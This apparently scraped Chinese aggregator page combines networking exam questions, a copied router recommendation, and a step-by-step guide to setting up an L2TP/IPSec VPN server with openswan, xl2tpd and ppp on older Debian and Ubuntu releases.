E.使用現成解決方案組建的網站
30.目前用於IP隧道的具有代表性的安全協議有()
A.L2F B.PPTP C.L2TP
D.PPP E.IP-Sec
三、名詞解釋題(本大題共5小題,每小題3分,共15分)
31.B2B網站
32.IP地址
33.域名解析
34.網站目標
35.網路系統安全備份
四、簡答題(本大題共5小題,每小題5分,共25分)
36.從商務模式角度,如何對電子商務網站進行分類?
37.簡述Intranet。�
38.簡述代理式Cache和透明式Cache的區別。
39.簡述電子商務網站開發的基本原則。
40.簡述訪問控制的基本功能。
五、論述題(本大題共2小題,每小題10分,共20分)
41.論述網上交易中安全的重要性以及網路支付的安全性要求。
42.論述基於IP-Sec的VPN的工作原理。

Ⅳ rt,有些要求,請寫明到時配置路由器的型號,交換機的型號等

一個企業級路由器+24口交換機

TP-LINK TL-R478G+ 多WAN口全千兆高速寬頻路由器 665元,京東商場

為什麼選擇這款:

它可為內網用戶分配上網賬號,只允許擁有合法賬號並經過認證的用戶接入網路,從而有效地控制內網用戶的上網許可權,滿足出租屋、住宅小區、酒店、中小學校園等帶寬共享網路環境對內網用戶進行接入認證的需求;支持空閑斷線、到期斷線、手動斷線、地址綁定、例外IP等豐富的功能特性,具備極強的使用靈活性。

支持智能IP帶寬控制功能,可根據實際帶寬利用率靈活啟用帶寬控制策略,可針對網路中每一台主機(IP)進行雙向帶寬控制,有效抑制BT、迅雷等P2P應用過度佔用帶寬,避免造成網路游戲卡、上網速度慢的問題,保障網路時刻暢通。
提供基於IP的連接數限制功能,可限制每一台電腦的連接數佔有量,合理利用有限的NAT連接數資源,防止少數用戶過度佔用大量連接數,確保游戲、上網、聊天、視頻語音等順暢進行。

以上是復制過來的。

路由器選擇企業級的,24口的交換機就可以隨便了

路由器不一定要這款,你可以到京東選擇類似功能的都可以

Ⅳ 哪位有github.com賬號許可權的好心人幫我到下載個源碼

提取碼:6h6d

Ⅵ 如何在 Debian / Ubuntu 伺服器上架設 L2TP / IPSec VPN

首先解釋一個問題:在 iPhone 的 VPN 設置介面里(Settings >> General >> Network >> VPN),你可以看到三個標簽:L2TP, PPTP, IPSec。但上面我們又講本次介紹的 VPN 方式叫「L2TP / IPSec」,這兩者究竟是什麼關系?

這三個標簽確實令人混淆,准確的寫法應該是:L2TP over IPSec, PPTP, Cisco IPSec。PPTP 跟另外兩者關系不大,且大家較為熟悉,暫且不提,L2TP 和 IPSec 的區別如下。

L2TP:一個「包裝」協議,本身並不提供加密和驗證的功能。

IPSec:在 IP 數據包的層級提供加密和驗證功能,確保中間人無法解密或者偽造數據包。

本來,只用 IPSec 就可以實現 VPN,Mac OS X 和 Linux 都支持。但是 Mac OS X 和 iPhone OS 都推薦使用 L2TP over IPSec,在兩者的圖形介面上也只能設置這個。L2TP / IPSec 是業界標准,微軟也支持。而只用 IPSec 的常見於 Linux-to-Linux 的應用,比如將兩個位於不同地區的辦公室網路安全地連在一起。這多是固定 IP 路由器到固定 IP 路由器級別的連接,只需保證數據包不被中途截獲或者偽造就可以,故使用 L2TP 的意義不大。L2TP / IPSec 主要是實現所謂「Road Warrior」的設置,即用變動的客戶端連固定的伺服器。

Cisco 的 VPN 用的也是 IPSec 加密,但那是一套不同於 L2TP 的私有包裝協議,用於提供用戶管理之類的功能,因此一般都需要用 Cisco 自家的 VPN 客戶端連接。iPhone / iPad 的 VPN 設置介面中的 IPSec 標簽里有 Cisco 的標識,就是這個原因。

以下是在 Ubuntu 和 Debian 主機上架設 L2TP / IPSec VPN 的步驟,一共十四步。你需要有伺服器的 root 許可權(所以 DreamHost, BlueHost, MediaTemple 這些服務供應商幫你把一切打點周到的主機就無緣了),也需要一些基本的 Linux 知識。不然的話,我們還是推薦您找一位比較熟技術的朋友幫忙。

一、安裝 IPSec。如上所述,IPSec 會對 IP 數據包進行加密和驗證。這意味著你的電腦 / 移動設備與伺服器之間傳輸的數據無法被解密、也不能被偽造。我推薦用 openswan 這個後台軟體包來跑 IPSec。

用以下命令安裝 openswan:

sudo aptitude install openswan二、用文字編輯器打開 /etc/ipsec.conf,改成這樣:

version 2.0
config setup
nat_traversal=yes
virtual_private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12
oe=off
protostack=netkey

conn L2TP-PSK-NAT
rightsubnet=vhost:%priv
also=L2TP-PSK-noNAT

conn L2TP-PSK-noNAT
authby=secret
pfs=no
auto=add
keyingtries=3
rekey=no
ikelifetime=8h
keylife=1h
type=transport
left=YOUR.SERVER.IP.ADDRESS
leftprotoport=17/1701
right=%any
rightprotoport=17/%any三、用文字編輯器打開 /etc/ipsec.secrets,改成這樣:

YOUR.SERVER.IP.ADDRESS %any: PSK "YourSharedSecret"(別忘了把「YOUR.SERVER.IP.ADDRESS」這部分換成你的伺服器的 IP 地址,把「YourSharedSecret」部分換成隨便一個字串,例如你喜歡的一句話,等等。)

四、運行以下命令:

for each in /proc/sys/net/ipv4/conf/*
do
echo 0 > $each/accept_redirects
echo 0 > $each/send_redirects
done五、檢查一下 IPSec 能否正常工作:

sudo ipsec verify如果在結果中看到「Opportunistic Encryption Support」被禁用了,沒關系,其他項 OK 即可。

六、重啟 openswan:

sudo /etc/init.d/ipsec restart七、安裝 L2TP。常用的 L2TP 後台軟體包是 xl2tpd,它和 openswan 是同一幫人寫的。

運行以下命令:

sudo aptitude install xl2tpd八、用文字編輯器打開 /etc/xl2tpd/xl2tpd.conf,改成這樣:

[global]
ipsec saref = yes

[lns default]
ip range = 10.1.2.2-10.1.2.255
local ip = 10.1.2.1
;require chap = yes
refuse chap = yes
refuse pap = yes
require authentication = yes
ppp debug = yes
pppoptfile = /etc/ppp/options.xl2tpd
length bit = yes這里要注意的是 ip range 一項里的 IP 地址不能和你正在用的 IP 地址重合,也不可與網路上的其他 IP 地址沖突。

九、安裝 ppp。這是用來管理 VPN 用戶的。

sudo aptitude install ppp十、檢查一下 /etc/ppp 目錄里有沒有 options.xl2tpd 這個文件,沒有的話就建一個,文件內容如下:

require-mschap-v2
ms-dns 208.67.222.222
ms-dns 208.67.220.220
asyncmap 0
auth
crtscts
lock
hide-password
modem
debug
name l2tpd
proxyarp
lcp-echo-interval 30
lcp-echo-failure 4注意 ms-dns 兩行我填的是 OpenDNS。如果你想用其他的 DNS 伺服器(例如谷歌的公共 DNS),請自行更換。

十一、現在可以添加一個 VPN 用戶了。用文字編輯器打開 /etc/ppp/chap-secrets:

# user server password ip
test l2tpd testpassword *如果你之前設置過 PPTP VPN,chap-secrets 文件里可能已經有了其他用戶的列表。你只要把 test l2tpd testpassword * 這樣加到後面即可。

十二、重啟 xl2tpd:

sudo /etc/init.d/xl2tpd restart十三、設置 iptables 的數據包轉發:

iptables --table nat --append POSTROUTING --jump MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward十四、因為某種原因,openswan 在伺服器重啟後無法正常自動,所以我們可以在 /etc/rc.local 文件里寫入如下語句:

iptables --table nat --append POSTROUTING --jump MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
for each in /proc/sys/net/ipv4/conf/*
do
echo 0 > $each/accept_redirects
echo 0 > $each/send_redirects
done
/etc/init.d/ipsec restart到這里,設置工作已經基本完成。你可以用 iPhone 或 iPad 試著連一下。記得在「Secret」中填入你在上述第三步里填的 YourSharedSecret。

如果連接成功,上網也沒問題的話,恭喜你,大功告成。如果連不上,恐怕還得多做一步。

Ubuntu 9.10 自帶的 openswan 版本是 2.6.22, Debian Lenny 帶的版本是 2.4.12。這兩個版本的 openswan 都有問題。我們的測試結果表明,2.6.24 版的 openswan 可以在上述兩版的 Linux 操作系統下正常工作。所以如果做完以上十四步還是連不上的話,請考慮從源碼編譯 openswan 2.6.24 :

sudo aptitude install libgmp3-dev gawk flex bison
wget http://www.openswan.org/download/openswan-2.6.24.tar.gz
tar xf openswan-2.6.24.tar.gz
cd openswan-2.6.24
make programs
sudo make install編譯需要一段時間。你的 Linux 內核版本需要高於 2.6.6。

然後可以刪除原先通過 aptitude 安裝的 openswan,並重啟之:

sudo aptitude remove openswan
sudo /etc/init.d/ipsec restart

閱讀全文

與xl2tpd源碼相關的資料

熱點內容
android圖片變灰 瀏覽:268
linuxvi下一個 瀏覽:975
安卓手機的應用鎖怎麼解 瀏覽:735
linux增加路徑 瀏覽:849
sql身份證號最後四位加密 瀏覽:533
xp系統表格加密 瀏覽:856
光遇安卓軍大衣什麼時候上線 瀏覽:840
android應用商店圖標 瀏覽:341
java計算圓的面積 瀏覽:643
應用編譯優化recovery 瀏覽:577
域控命令n 瀏覽:258
php導出文件 瀏覽:15
谷歌地圖網頁版無法連接伺服器地址 瀏覽:298
菜鳥工具在線編譯python 瀏覽:858
柵格化命令有何作用 瀏覽:825
為什麼壓縮文件不能解壓 瀏覽:311
足球app哪個軟體好 瀏覽:96
產品經理逼瘋程序員的一天 瀏覽:17
修改svn伺服器ip地址 瀏覽:584
下列關於編譯說法正確的是 瀏覽:246